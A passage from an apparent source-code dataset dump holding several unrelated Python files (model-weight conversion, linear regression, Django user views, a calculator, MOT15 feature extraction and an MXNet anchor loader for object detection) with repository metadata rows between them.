model_file_path,
log_file_path,
dst_model_file_ext,
log_line_num):
"""
Post-process weight/log files.
Parameters:
----------
dst_dir_path : str
Destination dir path.
model_name : str
Model name.
model_file_path : str
Model file path.
log_file_path : str
Log file path.
dst_model_file_ext : str
Destination model file extension.
log_line_num : int
Log file last line number for analysis.
Returns:
-------
top5_err : str
top5 error value.
sha1_value : str
sha1 hex digest.
"""
with open(log_file_path, "r") as f:
log_file_tail = f.read().splitlines()[log_line_num]
top5_err = re.findall(r"\d+\.\d+", re.findall(r", err-top5=\d+\.\d+", log_file_tail)[0])[0].split(".")[1]
sha1_value = calc_sha1(model_file_path)
dst_model_file_name = "{}-{}-{}.{}".format(model_name, top5_err, sha1_value[:8], dst_model_file_ext)
dst_model_file_path = os.path.join(dst_dir_path, dst_model_file_name)
os.rename(model_file_path, dst_model_file_path)
os.rename(log_file_path, dst_model_file_path + ".log")
with zipfile.ZipFile(dst_model_file_path + ".zip", "w", zipfile.ZIP_DEFLATED) as zf:
zf.write(filename=dst_model_file_path, arcname=dst_model_file_name)
os.remove(dst_model_file_path)
return top5_err, sha1_value
def process_fwk(prep_info_dict,
dst_framework,
dst_dir_path,
model_name,
model_file_path,
log_file_path):
"""
Process weights on specific framework.
Parameters:
----------
prep_info_dict : dict
Dictionary with preparation meta-info.
dst_dir_path : str
Destination dir path.
model_name : str
Model name.
model_file_path : str
Model file path.
log_file_path : str
Log file path.
dst_framework : str
Destination framework.
"""
if dst_framework == "gluon":
dst_model_file_ext = "params"
eval_script = "eval_gl"
num_gpus = 1
calc_flops = "--calc-flops"
log_line_num = -3
elif dst_framework == "pytorch":
dst_model_file_ext = "pth"
eval_script = "eval_pt"
num_gpus = 1
calc_flops = "--calc-flops"
log_line_num = -3
elif dst_framework == "chainer":
dst_model_file_ext = "npz"
eval_script = "eval_ch"
num_gpus = 0
calc_flops = ""
log_line_num = -2
elif dst_framework == "tf2":
dst_model_file_ext = "tf2.h5"
eval_script = "eval_tf2"
num_gpus = 1
calc_flops = ""
log_line_num = -2
else:
raise ValueError("Unknown framework: {}".format(dst_framework))
post_proc_log_files = [f for f in os.listdir(dst_dir_path) if f.endswith(".{}.log".format(dst_model_file_ext))]
assert (len(post_proc_log_files) in [0, 1])
if len(post_proc_log_files) == 0:
dst_raw_log_file_path = os.path.join(dst_dir_path, "train.log")
shutil.copy2(log_file_path, dst_raw_log_file_path)
dst_raw_model_file_path = os.path.join(dst_dir_path, "{}.{}".format(model_name, dst_model_file_ext))
if dst_framework == "gluon":
shutil.copy2(model_file_path, dst_raw_model_file_path)
else:
command = "python3 convert_models.py --src-fwk=gluon --dst-fwk={dst_framework} --src-model={model_name}" \
" --dst-model={model_name} --src-params={model_file_path}" \
" --dst-params={dst_raw_model_file_path} --save-dir={dst_dir_path}"
subprocess.call([command.format(
dst_framework=dst_framework,
model_name=model_name,
model_file_path=model_file_path,
dst_raw_model_file_path=dst_raw_model_file_path,
dst_dir_path=dst_dir_path)], shell=True)
command = "python3 {eval_script}.py --model={model_name} --resume={dst_raw_model_file_path}" \
" --save-dir={dst_dir_path} --num-gpus={num_gpus} --batch-size=100 -j=4 {calc_flops}"
subprocess.call([command.format(
eval_script=eval_script,
model_name=model_name,
dst_raw_model_file_path=dst_raw_model_file_path,
dst_dir_path=dst_dir_path,
num_gpus=num_gpus,
calc_flops=calc_flops)], shell=True)
if dst_framework == "gluon":
shutil.copy2(dst_raw_log_file_path, log_file_path)
top5_err, sha1_value = post_process(
dst_dir_path=dst_dir_path,
model_name=model_name,
model_file_path=dst_raw_model_file_path,
log_file_path=dst_raw_log_file_path,
dst_model_file_ext=dst_model_file_ext,
log_line_num=log_line_num)
else:
model_name1, top5_err, sha1_short = post_proc_log_files[0].split(".")[0].split("-")
assert (model_name1 == model_name)
dst_model_file_name = "{}-{}-{}.{}".format(model_name, top5_err, sha1_short, dst_model_file_ext)
dst_model_file_path = os.path.join(dst_dir_path, dst_model_file_name)
dst_zip_model_file_path = dst_model_file_path + ".zip"
assert os.path.exists(dst_zip_model_file_path)
with zipfile.ZipFile(dst_zip_model_file_path, "r") as zf:
zf.extract(dst_model_file_name, dst_dir_path)
sha1_value = calc_sha1(dst_model_file_path)
os.remove(dst_model_file_path)
prep_info_dict["Type"].append(dst_framework)
prep_info_dict["Top5"].append(top5_err)
prep_info_dict["Sha1"].append(sha1_value)
def main():
args = parse_args()
model_name = args.model
model_file_path = os.path.expanduser(args.resume)
if not os.path.exists(model_file_path):
raise Exception("Model file doesn't exist: {}".format(model_file_path))
root_dir_path = os.path.dirname(model_file_path)
log_file_path = os.path.join(root_dir_path, "train.log")
if not os.path.exists(log_file_path):
raise Exception("Log file doesn't exist: {}".format(log_file_path))
dst_dir_path = os.path.join(root_dir_path, "_result")
if not os.path.exists(dst_dir_path):
os.mkdir(dst_dir_path)
prep_info_dict = {
"Type": [],
"Top5": [],
"Sha1": [],
}
dst_frameworks = ["gluon", "pytorch", "chainer", "tf2"]
# dst_frameworks = ["tf2"]
for dst_framework in dst_frameworks:
process_fwk(
prep_info_dict=prep_info_dict,
dst_framework=dst_framework,
dst_dir_path=dst_dir_path,
model_name=model_name,
model_file_path=model_file_path,
log_file_path=log_file_path)
prep_info_df = pd.DataFrame(prep_info_dict)
prep_info_df.to_csv(
os.path.join(root_dir_path, "prep_info.csv"),
sep="\t",
index=False)
if __name__ == '__main__':
main()
| [
"osemery@gmail.com"
] | osemery@gmail.com |
5785c2cf7d09d99cb7127abda3281fc2feef3960 | 08f7a3c56db1b937696272fd07f1df52fee863d7 | /Linear_Regression/simple_linear_regression.py | fe03c685fb78748a12066fde223ebc9dfd90d6d7 | [
"MIT"
] | permissive | Randyjp/ml_sl_models | 5c29643f79c0c41fb38a51ae819ab7b9570740ab | 8d8735d312adc3e59398ce4154fc58dfe62c66a9 | refs/heads/master | 2021-09-07T12:23:02.545941 | 2018-02-22T21:24:32 | 2018-02-22T21:24:32 | 119,282,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,163 | py | from sklearn.datasets import load_boston
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import cross_val_predict, cross_val_score
import matplotlib.pyplot as plt
# load the data set we'll be working with. In this case the Boston housing
boston = load_boston()
y = boston.target # response variable(y) = median house price
# Task 1) make a linear regression model with lstat to predict median value
lsat = boston.data[:, 12].reshape(-1, 1) # select the 13th column and make it matrix(reshape)
lr1 = LinearRegression() # create the object
lr1.fit(lsat, y)
# cross_val_predict returns an array of the same size as `y` where each entry
# is a prediction obtained by cross validation:
predicted = cross_val_predict(lr1, lsat, y, cv=10)
scores = cross_val_score(lr1, lsat, y, cv=10)
print("Accuracy: %0.2f (+/- %0.2f)" % (scores.mean(), scores.std() * 2))
fig, ax = plt.subplots()
ax.scatter(y, predicted, edgecolors=(0, 0, 0)) # predicted values
ax.plot([y.min(), y.max()], [y.min(), y.max()], 'k--', lw=4) # regression line
ax.set_xlabel('Measured')
ax.set_ylabel('Predicted')
# uncomment line below to show graph
plt.show()
| [
"randy@Randys-MacBook-Pro.local"
] | randy@Randys-MacBook-Pro.local |
e48a135645e3ef4e54e636050eed7af1fa14972e | 9d1c260ff8e58335e0f373cfdd530e637ea803a8 | /EVENT.py | 963c1b66313d4f3a5b72fbc09ebc1ccffb81b482 | [
"MIT"
] | permissive | rambasnet/EVENT | e52931e3224b712e8b044e58382e4d170a835dc4 | dd3a6507112e4adc054481608d8968706f80d23f | refs/heads/master | 2020-06-01T23:39:28.843906 | 2019-06-09T20:07:02 | 2019-06-09T20:07:02 | 190,967,667 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 963 | py | #-----------------------------------------------------------------------------
# Name: event.py
# Purpose:
#
# Author: Ram Basnet
#
# Created: 2009/10/10
# RCS-ID: $Id: event.py $
# Copyright: (c) 2009
# Licence: All Rights Reserved.
#-----------------------------------------------------------------------------
import sys
import Parsers
import Consolidation
import Reports
import Charts
import Navigation
from Config import *
if __name__ == "__main__":
#fout = open('EVENT.log', 'w')
#temp = sys.stdout
#sys.stdout = fout
ReadConfigFile()
#Run parsers
Parsers.main()
#Run consolidation
Consolidation.main()
#run reports
Reports.main()
#run charts
Charts.main()
#run navigation
Navigation.GenerateNavigation()
raw_input('All done! Please hit Enter key to continue...')
#sys.stdout.close()
#sys.stdout = temp
| [
"rambasnet@gmail.com"
] | rambasnet@gmail.com |
b1e5746abe4f2a60c8abfb1769dffacfa9dc968c | 74b595899d732dba5d3880735d35003eac0d5695 | /users/views.py | 5a044a6810be38dbdd6e0bab44d451b3bba06921 | [] | no_license | SirCna98/FinalKarshenasiProjectSocialWebsite | 5f60c3dfb108db27af9ae7ce305bbf0b0bbec326 | 00b04c832b911da7a4132033c8690a739bcbbfa2 | refs/heads/master | 2023-06-21T20:14:25.860786 | 2021-07-08T07:10:01 | 2021-07-08T07:10:01 | 384,031,430 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,460 | py | from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .forms import UserRegisterForm, UserUpdateForm, ProfileUpdateForm
def register(request):
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
form.save()
# username = form.cleaned_data.get('username')
messages.success(request, f'Your account has been created! You are now able to log in')
return redirect('login')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
@login_required
def profile(request):
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = ProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
messages.success(request, f'Your account has been updated!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = ProfileUpdateForm(instance=request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form
}
return render(request, 'users/profile.html', context) | [
"46351734+SirCna98@users.noreply.github.com"
] | 46351734+SirCna98@users.noreply.github.com |
fb329b172f65df3eda2304e0d4b90c8211e3863f | 30816710f64515d9af98b19da522ecdd2a745258 | /origin/faster_rcnn/core/loader.py | 4281edcfaa68aef9a31cdc9bc02c5122ecfb40b4 | [] | no_license | unsky/Feature-Pyramid-Networks | 457a441a500b1b552b5a89c11384e96f8cf60dd5 | 890e9c74a8fcea20bd33b90bac6c58e42294298d | refs/heads/master | 2021-06-26T00:59:50.874246 | 2017-09-06T02:57:19 | 2017-09-06T02:57:19 | 101,043,340 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,702 | py | # --------------------------------------------------------
# Deformable Convolutional Networks
# Copyright (c) 2016 by Contributors
# Copyright (c) 2017 Microsoft
# Licensed under The Apache-2.0 License [see LICENSE for details]
# Modified by Yuwen Xiong
# --------------------------------------------------------
import numpy as np
import mxnet as mx
from mxnet.executor_manager import _split_input_slice
from config.config import config
from utils.image import tensor_vstack
from rpn.rpn import get_rpn_testbatch, get_rpn_batch, assign_anchor
from rcnn import get_rcnn_testbatch, get_rcnn_batch
class TestLoader(mx.io.DataIter):
def __init__(self, roidb, config, batch_size=1, shuffle=False,
has_rpn=False):
super(TestLoader, self).__init__()
# save parameters as properties
self.cfg = config
self.roidb = roidb
self.batch_size = batch_size
self.shuffle = shuffle
self.has_rpn = has_rpn
# infer properties from roidb
self.size = len(self.roidb)
self.index = np.arange(self.size)
# decide data and label names (only for training)
if has_rpn:
self.data_name = ['data', 'im_info']
else:
self.data_name = ['data', 'rois']
self.label_name = None
# status variable for synchronization between get_data and get_label
self.cur = 0
self.data = None
self.label = []
self.im_info = None
# get first batch to fill in provide_data and provide_label
self.reset()
self.get_batch()
@property
def provide_data(self):
return [[(k, v.shape) for k, v in zip(self.data_name, idata)] for idata in self.data]
@property
def provide_label(self):
return [None for _ in range(len(self.data))]
@property
def provide_data_single(self):
return [(k, v.shape) for k, v in zip(self.data_name, self.data[0])]
@property
def provide_label_single(self):
return None
def reset(self):
self.cur = 0
if self.shuffle:
np.random.shuffle(self.index)
def iter_next(self):
return self.cur < self.size
def next(self):
if self.iter_next():
self.get_batch()
self.cur += self.batch_size
return self.im_info, mx.io.DataBatch(data=self.data, label=self.label,
pad=self.getpad(), index=self.getindex(),
provide_data=self.provide_data, provide_label=self.provide_label)
else:
raise StopIteration
def getindex(self):
return self.cur / self.batch_size
def getpad(self):
if self.cur + self.batch_size > self.size:
return self.cur + self.batch_size - self.size
else:
return 0
def get_batch(self):
cur_from = self.cur
cur_to = min(cur_from + self.batch_size, self.size)
roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]
if self.has_rpn:
data, label, im_info = get_rpn_testbatch(roidb, self.cfg)
else:
data, label, im_info = get_rcnn_testbatch(roidb, self.cfg)
self.data = [[mx.nd.array(idata[name]) for name in self.data_name] for idata in data]
self.im_info = im_info
def get_batch_individual(self):
cur_from = self.cur
cur_to = min(cur_from + self.batch_size, self.size)
roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]
if self.has_rpn:
data, label, im_info = get_rpn_testbatch(roidb, self.cfg)
else:
data, label, im_info = get_rcnn_testbatch(roidb, self.cfg)
self.data = [mx.nd.array(data[name]) for name in self.data_name]
self.im_info = im_info
class AnchorLoader(mx.io.DataIter):
def __init__(self, feat_sym_p3,feat_sym_p4,feat_sym_p5,feat_sym_p6,
roidb, cfg, batch_size=1, shuffle=False, ctx=None, work_load_list=None,
feat_stride_p3=4,
anchor_scales_p3=(8, 16, 32),
anchor_ratios_p3=(0.5, 1, 2),
feat_stride_p4=8,
anchor_scales_p4=(8, 16, 32),
anchor_ratios_p4=(0.5, 1, 2),
feat_stride_p5=16,
anchor_scales_p5=(8, 16, 32),
anchor_ratios_p5=(0.5, 1, 2),
feat_stride_p6=32,
anchor_scales_p6=(8, 16, 32),
anchor_ratios_p6=(0.5, 1, 2),
allowed_border=0,
aspect_grouping=False):
"""
This Iter will provide roi data to Fast R-CNN network
:param feat_sym: to infer shape of assign_output
:param roidb: must be preprocessed
:param batch_size: must divide BATCH_SIZE(128)
:param shuffle: bool
:param ctx: list of contexts
:param work_load_list: list of work load
:param aspect_grouping: group images with similar aspects
:return: AnchorLoader
"""
super(AnchorLoader, self).__init__()
# save parameters as properties
self.feat_sym_p3 = feat_sym_p3
self.feat_sym_p4 = feat_sym_p4
self.feat_sym_p5 = feat_sym_p5
self.feat_sym_p6 = feat_sym_p6
self.roidb = roidb
self.cfg = cfg
self.batch_size = batch_size
self.shuffle = shuffle
self.ctx = ctx
if self.ctx is None:
self.ctx = [mx.cpu()]
self.work_load_list = work_load_list
self.feat_stride_p3 = feat_stride_p3
self.anchor_scales_p3 = anchor_scales_p3
self.anchor_ratios_p3 = anchor_ratios_p3
self.feat_stride_p4 = feat_stride_p4
self.anchor_scales_p4 = anchor_scales_p4
self.anchor_ratios_p4 = anchor_ratios_p4
self.feat_stride_p5 = feat_stride_p5
self.anchor_scales_p5 = anchor_scales_p5
self.anchor_ratios_p5 = anchor_ratios_p5
self.feat_stride_p6 = feat_stride_p6
self.anchor_scales_p6 = anchor_scales_p6
self.anchor_ratios_p6 = anchor_ratios_p6
self.allowed_border = allowed_border
self.aspect_grouping = aspect_grouping
# infer properties from roidb
self.size = len(roidb)
self.index = np.arange(self.size)
# decide data and label names
if config.TRAIN.END2END:
self.data_name = ['data', 'im_info', 'gt_boxes']
else:
self.data_name = ['data']
self.label_name = ['label/p3','label/p4','label/p5', 'label/p6','bbox_target/p3','bbox_target/p4','bbox_target/p5', 'bbox_target/p6','bbox_weight/p3','bbox_weight/p4','bbox_weight/p5','bbox_weight/p6']
# status variable for synchronization between get_data and get_label
self.cur = 0
self.batch = None
self.data = None
self.label = None
# get first batch to fill in provide_data and provide_label
self.reset()
self.get_batch_individual()
@property
def provide_data(self):
return [[(k, v.shape) for k, v in zip(self.data_name, self.data[i])] for i in xrange(len(self.data))]
@property
def provide_label(self):
return [[(k, v.shape) for k, v in zip(self.label_name, self.label[i])] for i in xrange(len(self.data))]
@property
def provide_data_single(self):
return [(k, v.shape) for k, v in zip(self.data_name, self.data[0])]
@property
def provide_label_single(self):
return [(k, v.shape) for k, v in zip(self.label_name, self.label[0])]
def reset(self):
self.cur = 0
if self.shuffle:
if self.aspect_grouping:
widths = np.array([r['width'] for r in self.roidb])
heights = np.array([r['height'] for r in self.roidb])
horz = (widths >= heights)
vert = np.logical_not(horz)
horz_inds = np.where(horz)[0]
vert_inds = np.where(vert)[0]
inds = np.hstack((np.random.permutation(horz_inds), np.random.permutation(vert_inds)))
extra = inds.shape[0] % self.batch_size
inds_ = np.reshape(inds[:-extra], (-1, self.batch_size))
row_perm = np.random.permutation(np.arange(inds_.shape[0]))
inds[:-extra] = np.reshape(inds_[row_perm, :], (-1,))
self.index = inds
else:
np.random.shuffle(self.index)
def iter_next(self):
return self.cur + self.batch_size <= self.size
def next(self):
if self.iter_next():
self.get_batch_individual()
self.cur += self.batch_size
return mx.io.DataBatch(data=self.data, label=self.label,
pad=self.getpad(), index=self.getindex(),
provide_data=self.provide_data, provide_label=self.provide_label)
else:
raise StopIteration
def getindex(self):
return self.cur / self.batch_size
def getpad(self):
if self.cur + self.batch_size > self.size:
return self.cur + self.batch_size - self.size
else:
return 0
def infer_shape(self, max_data_shape=None, max_label_shape=None):
""" Return maximum data and label shape for single gpu """
if max_data_shape is None:
max_data_shape = []
if max_label_shape is None:
max_label_shape = []
max_shapes = dict(max_data_shape + max_label_shape)
input_batch_size = max_shapes['data'][0]
im_info = [[max_shapes['data'][2], max_shapes['data'][3], 1.0]]
_, feat_shape_p3, _ = self.feat_sym_p3.infer_shape(**max_shapes)
_, feat_shape_p4, _ = self.feat_sym_p4.infer_shape(**max_shapes)
_, feat_shape_p5, _ = self.feat_sym_p5.infer_shape(**max_shapes)
_, feat_shape_p6, _ = self.feat_sym_p6.infer_shape(**max_shapes)
label = assign_anchor(feat_shape_p3[0],feat_shape_p4[0],feat_shape_p5[0] ,feat_shape_p6[0],np.zeros((0, 5)), im_info, self.cfg,
self.feat_stride_p3, self.anchor_scales_p3, self.anchor_ratios_p3,
self.feat_stride_p4, self.anchor_scales_p4, self.anchor_ratios_p4,
self.feat_stride_p5, self.anchor_scales_p5, self.anchor_ratios_p5,
self.feat_stride_p6, self.anchor_scales_p6, self.anchor_ratios_p6,
self.allowed_border)
label = [label[k] for k in self.label_name]
label_shape = [(k, tuple([input_batch_size] + list(v.shape[1:]))) for k, v in zip(self.label_name, label)]
return max_data_shape, label_shape
def get_batch(self):
# slice roidb
cur_from = self.cur
cur_to = min(cur_from + self.batch_size, self.size)
roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]
# decide multi device slice
work_load_list = self.work_load_list
ctx = self.ctx
if work_load_list is None:
work_load_list = [1] * len(ctx)
assert isinstance(work_load_list, list) and len(work_load_list) == len(ctx), \
"Invalid settings for work load. "
slices = _split_input_slice(self.batch_size, work_load_list)
# get testing data for multigpu
data_list = []
label_list = []
for islice in slices:
iroidb = [roidb[i] for i in range(islice.start, islice.stop)]
data, label = get_rpn_batch(iroidb, self.cfg)
data_list.append(data)
label_list.append(label)
# pad data first and then assign anchor (read label)
data_tensor = tensor_vstack([batch['data'] for batch in data_list])
for data, data_pad in zip(data_list, data_tensor):
data['data'] = data_pad[np.newaxis, :]
new_label_list = []
for data, label in zip(data_list, label_list):
# infer label shape
data_shape = {k: v.shape for k, v in data.items()}
del data_shape['im_info']
_, feat_shape_p3, _ = self.feat_sym_p3.infer_shape(**data_shape)
feat_shape_p3 = [int(i) for i in feat_shape_p3[0]]
_, feat_shape_p4, _ = self.feat_sym_p4.infer_shape(**data_shape)
feat_shape_p4 = [int(i) for i in feat_shape_p4[0]]
_, feat_shape_p5, _ = self.feat_sym_p5.infer_shape(**data_shape)
feat_shape_p5 = [int(i) for i in feat_shape_p5[0]]
_, feat_shape_p6, _ = self.feat_sym_p6.infer_shape(**data_shape)
feat_shape_p6 = [int(i) for i in feat_shape_p6[0]]
# add gt_boxes to data for e2e
data['gt_boxes'] = label['gt_boxes'][np.newaxis, :, :]
# assign anchor for label
label = assign_anchor(feat_shape_p3,feat_shape_p4,feat_shape_p5,feat_shape_p6,label['gt_boxes'], data['im_info'], self.cfg,
self.feat_stride_p3, self.anchor_scales_p3,self.anchor_ratios_p3,
self.feat_stride_p4, self.anchor_scales_p4,self.anchor_ratios_p4,
self.feat_stride_p5, self.anchor_scales_p5,self.anchor_ratios_p5,
self.feat_stride_p6, self.anchor_scales_p6,self.anchor_ratios_p6,
self.allowed_border)
new_label_list.append(label)
all_data = dict()
for key in self.data_name:
all_data[key] = tensor_vstack([batch[key] for batch in data_list])
all_label = dict()
for key in self.label_name:
pad = -1 if key == 'label' else 0
all_label[key] = tensor_vstack([batch[key] for batch in new_label_list], pad=pad)
self.data = [mx.nd.array(all_data[key]) for key in self.data_name]
self.label = [mx.nd.array(all_label[key]) for key in self.label_name]
def get_batch_individual(self):
cur_from = self.cur
cur_to = min(cur_from + self.batch_size, self.size)
roidb = [self.roidb[self.index[i]] for i in range(cur_from, cur_to)]
# decide multi device slice
work_load_list = self.work_load_list
ctx = self.ctx
if work_load_list is None:
work_load_list = [1] * len(ctx)
assert isinstance(work_load_list, list) and len(work_load_list) == len(ctx), \
"Invalid settings for work load. "
slices = _split_input_slice(self.batch_size, work_load_list)
rst = []
for idx, islice in enumerate(slices):
iroidb = [roidb[i] for i in range(islice.start, islice.stop)]
rst.append(self.parfetch(iroidb))
all_data = [_['data'] for _ in rst]
all_label = [_['label'] for _ in rst]
self.data = [[mx.nd.array(data[key]) for key in self.data_name] for data in all_data]
self.label = [[mx.nd.array(label[key]) for key in self.label_name] for label in all_label]
def parfetch(self, iroidb):
# get testing data for multigpu
data, label = get_rpn_batch(iroidb, self.cfg)
data_shape = {k: v.shape for k, v in data.items()}
del data_shape['im_info']
_, feat_shape_p3, _ = self.feat_sym_p3.infer_shape(**data_shape)
feat_shape_p3 = [int(i) for i in feat_shape_p3[0]]
_, feat_shape_p4, _ = self.feat_sym_p4.infer_shape(**data_shape)
feat_shape_p4 = [int(i) for i in feat_shape_p4[0]]
_, feat_shape_p5, _ = self.feat_sym_p5.infer_shape(**data_shape)
feat_shape_p5 = [int(i) for i in feat_shape_p5[0]]
_, feat_shape_p6, _ = self.feat_sym_p6.infer_shape(**data_shape)
feat_shape_p6 = [int(i) for i in feat_shape_p6[0]]
# add gt_boxes to data for e2e
data['gt_boxes'] = label['gt_boxes'][np.newaxis, :, :]
# assign anchor for label
label = assign_anchor(feat_shape_p3,feat_shape_p4,feat_shape_p5,feat_shape_p6, label['gt_boxes'], data['im_info'], self.cfg,
self.feat_stride_p3, self.anchor_scales_p3,self.anchor_ratios_p3,
self.feat_stride_p4, self.anchor_scales_p4,self.anchor_ratios_p4,
self.feat_stride_p5, self.anchor_scales_p5,self.anchor_ratios_p5,
self.feat_stride_p6, self.anchor_scales_p6,self.anchor_ratios_p6,
self.allowed_border)
return {'data': data, 'label': label}
| [
"2081264@qq.com"
] | 2081264@qq.com |
66eaa91bd8b9ba468b7fe3e980d9d3b87fff3a67 | ae88a361b06ec0148794d31c9dcb9d608007a555 | /Problems/Piggy bank/task.py | e6badc571d1a8ccf3722fd63d109e9dfd67b91a0 | [] | no_license | IkDev08/Coffe_Machine.py | 2a689fa4e8105aaa14d92fba92f7c0a6b95b9326 | 2070a44468a7d27ba9397408558bf106984252a6 | refs/heads/master | 2022-12-08T11:37:18.518831 | 2020-08-12T23:26:59 | 2020-08-12T23:26:59 | 286,838,633 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | class PiggyBank:
def __init__(self, dollars, cents):
self.dollars = dollars
self.cents = cents
def add_money(self, deposit_dollars, deposit_cents):
self.dollars += deposit_dollars + (self.cents + deposit_cents) // 100
self.cents = (self.cents + deposit_cents) % 100
| [
"ikramcodepro@gmail.com"
] | ikramcodepro@gmail.com |
394aae955584b27d44b90dca03f5daec522f9a3d | b2bfd1c01b956b1e21aa231bb2c592498fbdeac4 | /calculator2_old.py | 14bcd4227e3db895fb4e46704e76401c104b0143 | [] | no_license | shlampley/learning | 943cce6d980f7be2dc27773e4906bf357993b3dc | 7c6d1c11e3fe46fdd02eaeb5e4ada66327cb3bfd | refs/heads/main | 2023-06-06T03:03:00.402008 | 2021-06-28T05:08:07 | 2021-06-28T05:08:07 | 374,529,968 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,776 | py |
def add(x, y):
return x + y
def subtract(x, y):
return x - y
def multiply(x, y):
return x * y
def divide(x, y):
return x / y
def main():
# Print out initial instructions
print("select opperation. ")
print("1.Add ")
print("2.Subtract ")
print("3.Multiply ")
print("4.Divide ")
# begin loop for user input
while True:
opperation = input("enter operation: ")
if opperation in ("1", "2", "3", "4"):
num1 = ""
num2 = ""
# first number check
while True:
num1 = input("Enter first Number: ")
if not num1.isnumeric():
print("invalid input, must be a number")
else:
break
num1 = float(num1)
#second number check
while True:
num2 = input("Enter second Number: ")
if not num2.isnumeric():
print("invalid input, must be a number")
else:
break
num2 = float(num2)
#opperation check
if opperation == "1":
print(num1, "+", num2, "=", add(num1, num2))
elif opperation == "2":
print(num1, "-", num2, "=", subtract(num1, num2))
elif opperation == "3":
print(num1, "*", num2, "=", multiply(num1, num2))
elif opperation == "4":
print(num1, "/", num2, "=", divide(num1, num2))
break
else:
print("invalid input")
#randomstring = "this is a string"
#if randomstring.isnumeric():
# do stuff
#else:
# print("invalid input, your opperation must be a number")
if __name__ == '__main__':
main()
| [
"shanelampley09@gmail.com"
] | shanelampley09@gmail.com |
f98415d5d18eb4b792776ce32c19d1c5c5c071ff | 8c16a4c80612d6a0f7917114c01da26447beee17 | /code/ReID_net/Forwarding/MOT15Forwarder.py | 847a576f1920cef5da289341d6f5749b9ea093c8 | [
"MIT"
] | permissive | sbouchardet/PReMVOS | 89d3088593a2d5719537478475362b765f5f82a4 | 0743b632ea7525b2b43f2f31e3891d7437837d84 | refs/heads/master | 2022-09-10T19:38:45.477840 | 2020-06-01T01:51:41 | 2020-06-01T01:51:41 | 268,400,213 | 0 | 0 | MIT | 2020-06-01T01:50:10 | 2020-06-01T01:50:09 | null | UTF-8 | Python | false | false | 4,012 | py | from .Forwarder import Forwarder
import numpy
from ReID_net.Log import log
import time
class MOT15Forwarder(Forwarder):
def __init__(self, engine):
super(MOT15Forwarder, self).__init__(engine)
self.data = engine.valid_data.seq_data.eval()
self.engine = engine
def forward(self, network, data, save_results=True, save_logits=False):
for seq_num in range(data.num_seq):
T = data.Ts[seq_num]
self.window_size = 10
# self.window_size = T
seq = data.seq_list[seq_num]
output_dir = data.data_dir + "/" + seq + "/det/comparison_triplet_features.txt"
outfile = open(output_dir, 'w')
features = self._extract_intermediate_features(network, data, seq_num)
# self._compare_features(self.engine, network, data, features,outfile, seq_num)
self._save_intermediate_features(self.engine, network, data, features,outfile, seq_num)
def _extract_intermediate_features(self, network, data, seq_num):
# def _extract_intermediate_features(self, network, data):
idx_placeholder = data.idx_placeholder
batch_size = network.batch_size
# seq_data = data.seq_data.eval(feed_dict={data.seq_num_placeholder:seq_num})
# seq_data = data.seq_data
out_layer = network.tower_layers[0]["fc1"]
assert len(out_layer.outputs) == 1
out_feature = out_layer.outputs[0]
out_feature_size = out_layer.n_features
features = numpy.empty([0, out_feature_size])
# m = seq_data.shape[0]
m = data.Ms[seq_num]
idx = 0
while idx < m:
start = time.time()
idx_value = [idx, min(idx + 2 * batch_size, m), 0, 1]
feature_val = self.engine.session.run([out_feature], feed_dict={idx_placeholder: idx_value, data.seq_num_placeholder:seq_num})
# feature_val = self.engine.session.run([out_feature],feed_dict={idx_placeholder: idx_value})
features = numpy.concatenate((features, feature_val[0]), axis=0)
end = time.time()
elapsed = end - start
print(min(idx + 2 * batch_size, m), '/', m, "elapsed", elapsed, file=log.v5)
idx += 2 * batch_size
return features
def _compare_features(self, engine, network, data, features,outfile, seq_num):
# def _compare_features(self, engine, network, data, features, outfile):
y = network.y_softmax
in_layer = network.tower_layers[0]["siam_concat"]
assert len(in_layer.outputs) == 1
in_feature = in_layer.outputs[0]
merge_type = engine.config.str("merge_type", "")
start = time.time()
# seq_data = data.seq_data.eval(feed_dict={data.seq_num_placeholder: seq_num})
# seq_data = data.seq_data
# m = seq_data.shape[0]
m = data.Ms[seq_num]
# T = int(seq_data[:, 0].max())
window_size = self.window_size #T #10
inc = numpy.arange(m)
seq_data = self.data[data.look_up[seq_num]:data.look_up[seq_num+1],:]
for idx1 in range(m):
t = seq_data[idx1, 0]
t = t.astype(int)
for future_t in range(t+1,t+window_size+1):
idx2 = inc[seq_data[:, 0] == future_t]
feature1 = features[(idx1,) * idx2.size, :]
feature2 = features[idx2,:]
if merge_type == "add":
feature_val = feature1 + feature2
elif merge_type == "subtract":
feature_val = feature1 - feature2
elif merge_type == "abs_subtract":
feature_val = numpy.abs(feature1 - feature2)
else: # merge_type == "concat":
feature_val = numpy.concatenate((feature1, feature2), axis=1)
y_val = engine.session.run(y, feed_dict={in_feature: feature_val})
for i in range(idx2.size):
outfile.write("%i %i %f\n"%(idx1,idx2[i],y_val[i][1]))
end = time.time()
elapsed = end - start
print("elapsed", elapsed, file=log.v5)
print(file=log.v4)
def _save_intermediate_features(self, engine, network, data, features, outfile, seq_num):
import pickle as pickle
pickle.dump(features,outfile)
# for idx in range(len(features)):
# outfile.write("%i %f\n" % (idx, features[idx,:]))
| [
"jonathon.luiten@rwth-aachen.de"
] | jonathon.luiten@rwth-aachen.de |
77b375ea92af6828ac619b1f95161a31ede5b9e0 | 73d97144ae324f17afc12f198e207f4eaf3ab5f2 | /test/functional/create_cache.py | 3a75a38eb7536824f4e4799f7995b0ca047ee13c | [
"MIT"
